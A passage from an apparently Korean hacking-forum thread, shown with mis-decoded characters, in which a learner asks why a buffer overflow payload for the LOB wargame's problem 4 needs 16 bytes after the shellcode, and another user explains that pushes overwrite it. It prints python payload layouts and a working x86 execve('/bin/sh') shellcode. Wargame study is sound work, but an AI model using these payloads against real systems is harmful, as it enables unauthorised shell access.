·¹º§ ÇØÅ·

 2839, 1/142 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   incaro
   LOB Áú¹®]] ¿Ö! 16ByteÀÌ¿©¾ß Çϴ°¡.

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=3213 [º¹»ç]


*LOB ¹®Á¦4¿¡¼­ BUFFER°¡ [40Byte]ÀÌ°í, ÀϹÝÀûÀÎ ¹öÆÛ ¿À¹öÇÃ·Î¿ì ¹æ½ÄÀ¸·Î ¼ÐÄڵ带 »ðÀÔÇÏ¿©
¹®Á¦¸¦ Ç®¾úÀ»¶§  ´ÙÀ½°ú °°Àº »çÇ×ÀÌ Àִµ¥¿ä.



±Ã±ÝÇÑ°Í Çϳª)
¾Æ·¡¿Í °°ÀÌ ¼ÐÄÚµå ¿À¸¥ÂÊ ¾î¶°ÇÑ °ª(¿¹:NOP)À» ä¿ï¶§
ÇÑ°¡Áö Á¶°ÇÀÌ ²À µÚ¿¡´Â 16Byte ÀÌ»ó µÇ¾ß ÇÑ´Ù´Â °ÍÀÔ´Ï´Ù.
* ¨ë, ¨ì ¹ø°ú °°ÀÌ ¼ÐÄÚµå ¿À¸¥ÂÊ¿¡ 16ByteÀ϶§¸¸ Á¤»óÀûÀ¸·Î ¼Ð±ÇÇÑÀ» µû³¾¼ö ÀÖ¾ú½À´Ï´Ù..
___________________________________________________________
¨ç[NOP*20] + [¼ÐÄÚµå] + [RET]                        (X)
$(python -c 'print "\x90"*20 + "¼ÐÄÚµå" + "RET ÁÖ¼Ò"')
¨è[NOP*16] + [¼ÐÄÚµå] + [NOP*4] + [RET]         (X)
$(python -c 'print "\x90"*16 + "¼ÐÄÚµå" + "\x90"*4 + "RET ÁÖ¼Ò"')
¨é[NOP*12] + [¼ÐÄÚµå] + [NOP*8] + [RET]         (X)
$(python -c 'print "\x90"*12 + "¼ÐÄÚµå" + "\x90"*8 + "RET ÁÖ¼Ò"')
¨ê[NOP*8]  + [¼ÐÄÚµå]  + [NOP*12] + [RET]       (X)
$(python -c 'print "\x90"*8 + "¼ÐÄÚµå" + "\x90"*12 + "RET ÁÖ¼Ò"')
¨ë[NOP*4]  + [¼ÐÄÚµå]  + [NOP*16] + [RET]       (O)
$(python -c 'print "\x90"*4 + "¼ÐÄÚµå" + "\x90"*16 + "RET ÁÖ¼Ò"')
¨ì[¼ÐÄÚµå]  + [NOP*20] + [RET]                       (O)
$(python -c 'print "¼ÐÄÚµå" + "\x90"*20 + "RET ÁÖ¼Ò"')
___________________________________________________________
»ç¿ëÇÑ ¼ÐÄÚµå :
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
___________________________________________________________
[BUFFER (40Byte)] + [EBP(4Byte)] + [RET (4Byte)]
[          NOP + ¼ÐÄڵ堠+ NOP  +  RETÁÖ¼Ò       ]
-----------------------------------------------------------

±Ã±ÝÇÑ°Í µÎ¿ï)
*±×·¯³ª À§Ã³·³ NOP ½ä¸Å¸¦ ¾²Áö ¾Ê°í ¿µ¹®ÀÚ ½ºÆ丵µµ µÇ´õ±º¿ä.
¿¹ )
             ["A"*4]  + [¼ÐÄÚµå]  + ["A"*16] + [RET]         (O)
             ["B"*4]  + [¼ÐÄÚµå]  + ["B"*16] + [RET]         (O)
             ["C"*4]  + [¼ÐÄÚµå]  + ["C"*16] + [RET]         (O)
             [¼ÐÄÚµå]  + ["Z"*20] + [RET]                        (O)
------------------------------------------------------------------------------------
(¡Ø. LOB¹®Á¦4¿¡¼­¸¸ ±×·±°ÍÀº ¾Æ´Õ´Ï´Ù.)


±×·¯³ª Á¤È®ÇÑ ÀÌÀ¯¸¦ ¸ð¸£°Ú³×¿ä!
ÁÁÀº ´äº¯ ±â´Ù¸³´Ï´Ù.  ÁÁÀº ÇÏ·ç µÇ¼¼¿ä^^
  Hit : 3579     Date : 2011/06/01 06:30


    
¸Û¸Û Áú¹® ÀÌÇØ ºÒ°¡.. Á˼ÛÇÕ´Ï´Ù 2011/06/02  
incaro Á˼ÛÇÕ´Ï´Ù ³Ê¹« µÎ¼­ ¾øÀÌ Áú¹®À» µå·È³×¿ä.
¼öÁ¤ÇÏ¿´½À´Ï´Ù.		 2011/06/02  
º°ºûÀ»´ã¾Æ dummy ºÎºÐÀÌ À־ ±×·±°Å ¾Æ´Ñ°¡¿ä? ¤·¤µ¤·
LOBºÎÅÍ´Â FTZ¿Í ´Ù¸£°Ô dummy°¡ ÀÖ´Ù°í µéÀº°Å °°Àºµ¥ ¸»ÀÌÁÒ;		 2011/06/03  
incaro ±×¹Ý´ë·Î FTZ´Â dummy°¡ ÀÖ°í
LOB´Â gcc version egcs-2.91.66 ·Î ´õ¹Ì°¡ ¾ø½À´Ï´Ù.
Àú ±ÔÄ¢À» ¸ð¸£°Ú³×¿ä ;; ¾Æ½Ã´ÂºÐ ¤Ì¤Ì ´äº¯Á» ºÎŹµå·Á¿ä		 2011/06/03  
guswns0528 shellcode°¡ ½ÇÇàµÇ¸é¼­ ´ëºÎºÐ ÀÎÀÚ¸¦ ³Ñ±â±â À§Çؼ­ esp¸¦ º¯°æÇÕ´Ï´Ù. À̶§ esp°¡ ¹Ù²î´Â ¹æÇâÀº stackÀÌ ÀÚ¶ó´Â ¹æÇâÀε¥ push¸í·ÉÀ̳ª mov¸í·ÉÀ¸·Î °ªÀ» ¾²°Ô µÇ¸é shellcode¸¦ µ¤¾î¾¹´Ï´Ù. ±×·¡¼­ ½©Äڵ尡 ½ÇÇàµÇ´Ù°¡ illeagal instructionÀ̳ª segfault°¡ ³ª°Ô µË´Ï´Ù. 2011/06/07  
incaro ´äº¯ °¨»çµå·Á¿ä. 2011/06/09  
¸Û¸Û guswns0528´Ô ´äº¯ÀÌ Á¤È®Çϳ׿ä~ 2011/07/04